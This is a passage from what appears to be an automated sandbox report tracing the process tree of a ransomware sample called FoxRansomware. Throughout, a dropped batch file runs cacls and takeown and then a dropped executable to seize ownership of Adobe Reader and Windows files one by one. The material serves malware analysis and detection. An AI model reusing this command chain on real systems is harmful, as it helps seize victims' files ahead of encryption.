  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf""
  2⤵
  - Loads dropped DLL
  PID:1588
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf" /E /G Admin:F /C
    3⤵
    PID:1676
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf"
    3⤵
    - Modifies file permissions
    PID:1000
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "MinionPro-BoldIt.otf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1608
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "MinionPro-BoldIt.otf" -nobanner
      4⤵
      Executes dropped EXE
      PID:1600
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1304
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB""
  2⤵
  - Loads dropped DLL
  PID:1880
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB" /E /G Admin:F /C
    3⤵
    PID:604
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB"
    3⤵
    - Modifies file permissions
    PID:268
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "SY______.PFB" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1120
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "SY______.PFB" -nobanner
      4⤵
      Executes dropped EXE
      PID:992
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:952
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp""
  2⤵
  - Loads dropped DLL
  PID:1384
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp" /E /G Admin:F /C
    3⤵
    PID:1868
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp"
    3⤵
    - Modifies file permissions
    PID:1320
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "brt.hyp" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1712
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "brt.hyp" -nobanner
      4⤵
      Executes dropped EXE
      PID:664
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1276
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx""
  2⤵
  - Loads dropped DLL
  PID:1740
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx" /E /G Admin:F /C
    3⤵
    PID:1828
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx"
    3⤵
    - Modifies file permissions
    PID:1512
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "eng32.clx" -nobanner
    3⤵
    - Loads dropped DLL
    PID:876
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "eng32.clx" -nobanner
      4⤵
      Executes dropped EXE
      PID:316
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1368
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT""
  2⤵
  - Loads dropped DLL
  PID:560
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT" /E /G Admin:F /C
    3⤵
    PID:828
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT"
    3⤵
    - Modifies file permissions
    PID:1944
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "CENTEURO.TXT" -nobanner
    3⤵
    - Loads dropped DLL
    PID:972
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "CENTEURO.TXT" -nobanner
      4⤵
      Executes dropped EXE
      PID:108
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1948
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT""
  2⤵
  - Loads dropped DLL
  PID:1608
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT" /E /G Admin:F /C
    3⤵
    PID:1748
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT"
    3⤵
    - Modifies file permissions
    PID:1328
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "UKRAINE.TXT" -nobanner
    3⤵
    - Loads dropped DLL
    PID:604
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "UKRAINE.TXT" -nobanner
      4⤵
      Executes dropped EXE
      PID:268
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:992
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini""
  2⤵
  - Loads dropped DLL
  PID:292
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini" /E /G Admin:F /C
    3⤵
    PID:1756
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini"
    3⤵
    - Modifies file permissions
    PID:1984
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "AGMGPUOptIn.ini" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1616
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "AGMGPUOptIn.ini" -nobanner
      4⤵
      Executes dropped EXE
      PID:316
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1368
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini""
  2⤵
  - Loads dropped DLL
  PID:1740
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini" /E /G Admin:F /C
    3⤵
    PID:828
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini"
    3⤵
    - Modifies file permissions
    PID:1700
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "eula.ini" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1676
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "eula.ini" -nobanner
      4⤵
      Executes dropped EXE
      PID:1800
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1184
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png""
  2⤵
  - Loads dropped DLL
  PID:1688
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png" /E /G Admin:F /C
    3⤵
    PID:1328
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:268
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "FreeCellMCE.png" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1120
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "FreeCellMCE.png" -nobanner
      4⤵
      Executes dropped EXE
      PID:1608
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1708
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc""
  2⤵
  - Loads dropped DLL
  PID:1712
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc" /E /G Admin:F /C
    3⤵
    PID:2028
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc"
    3⤵
    - Modifies file permissions
    PID:1984
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "AcroSign.prc" -nobanner
    3⤵
    - Loads dropped DLL
    PID:876
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "AcroSign.prc" -nobanner
      4⤵
      Executes dropped EXE
      PID:800
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1856
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig""
  2⤵
  - Loads dropped DLL
  PID:1276
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig" /E /G Admin:F /C
    3⤵
    PID:1944
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig"
    3⤵
    - Modifies file permissions
    PID:1700
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "cryptocme2.sig" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1600
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "cryptocme2.sig" -nobanner
      4⤵
      Executes dropped EXE
      PID:972
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1652
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf""
  2⤵
  - Loads dropped DLL
  PID:1956
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf" /E /G Admin:F /C
    3⤵
    PID:1364
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf"
    3⤵
    - Modifies file permissions
    PID:520
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "MyriadCAD.otf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1380
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "MyriadCAD.otf" -nobanner
      4⤵
      Executes dropped EXE
      PID:1304
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1960
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif""
  2⤵
  - Loads dropped DLL
  PID:1688
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif" /E /G Admin:F /C
    3⤵
    PID:1984
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif"
    3⤵
    - Modifies file permissions
    PID:800
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "create_form.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:876
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "create_form.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:1368
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:536
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif""
  2⤵
  PID:664
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif" /E /G Admin:F /C
    3⤵
    PID:560
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif"
    3⤵
    - Modifies file permissions
    PID:1800
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "info.gif" -nobanner
    3⤵
    PID:1300
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "info.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:1652
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1276
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif""
  2⤵
  PID:760
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif" /E /G Admin:F /C
    3⤵
    PID:1588
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif"
    3⤵
    - Modifies file permissions
    PID:1380
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "review_same_reviewers.gif" -nobanner
    3⤵
    PID:1120
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "review_same_reviewers.gif" -nobanner
      4⤵
      PID:1632
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:740
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif""
  2⤵
  PID:1616
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif" /E /G Admin:F /C
    3⤵
    PID:1368
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif"
    3⤵
    - Modifies file permissions
    PID:1296
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "trash.gif" -nobanner
    3⤵
    PID:536
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "trash.gif" -nobanner
      4⤵
      PID:1528
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1228
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf""
  2⤵
  PID:1676
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf" /E /G Admin:F /C
    3⤵
    PID:1976
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf"
    3⤵
    - Modifies file permissions
    PID:1300
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "CourierStd-Bold.otf" -nobanner
    3⤵
    PID:1920
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "CourierStd-Bold.otf" -nobanner
      4⤵
      PID:1944
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1948
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf""
  2⤵
  PID:1588
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf" /E /G Admin:F /C
    3⤵
    PID:1960
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf"
    3⤵
    - Modifies file permissions
    PID:1608
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "MyriadPro-It.otf" -nobanner
    3⤵
    PID:268
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "MyriadPro-It.otf" -nobanner
      4⤵
      PID:760
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:272
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt""
  2⤵
  PID:1708
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt" /E /G Admin:F /C
    3⤵
    PID:1296
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt"
    3⤵
    - Modifies file permissions
    PID:1528
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner
    3⤵
    PID:536
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner
      4⤵
      PID:1000
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1984
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp""
  2⤵
  PID:316
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp" /E /G Admin:F /C
    3⤵
    PID:1384
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp"
    3⤵
    - Modifies file permissions
    PID:964
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "can.hyp" -nobanner
    3⤵
    PID:1276
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "can.hyp" -nobanner
      4⤵
      PID:1364
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:292
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp""
  2⤵
  PID:560
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp" /E /G Admin:F /C
    3⤵
    PID:1960
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp"
    3⤵
    - Modifies file permissions
    PID:740
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "usa37.hyp" -nobanner
    3⤵
    PID:520
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "usa37.hyp" -nobanner
      4⤵
      PID:604
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:980
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT""
  2⤵
  PID:1588
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT" /E /G Admin:F /C
    3⤵
    PID:2028
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT"
    3⤵
    - Modifies file permissions
    PID:1416
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "ICELAND.TXT" -nobanner
    3⤵
    PID:1000
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "ICELAND.TXT" -nobanner
      4⤵
      PID:536
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1984
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT""
  2⤵
  PID:1708
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT" /E /G Admin:F /C
    3⤵
    PID:1384
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT"
    3⤵
    - Modifies file permissions
    PID:1948
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "CP1254.TXT" -nobanner
    3⤵
    PID:1364
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "CP1254.TXT" -nobanner
      4⤵
      PID:1276
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:292
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml""
  2⤵
  PID:316
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml" /E /G Admin:F /C
    3⤵
    PID:1960
- - C:\Windows\SysWOW64\takeown.exe
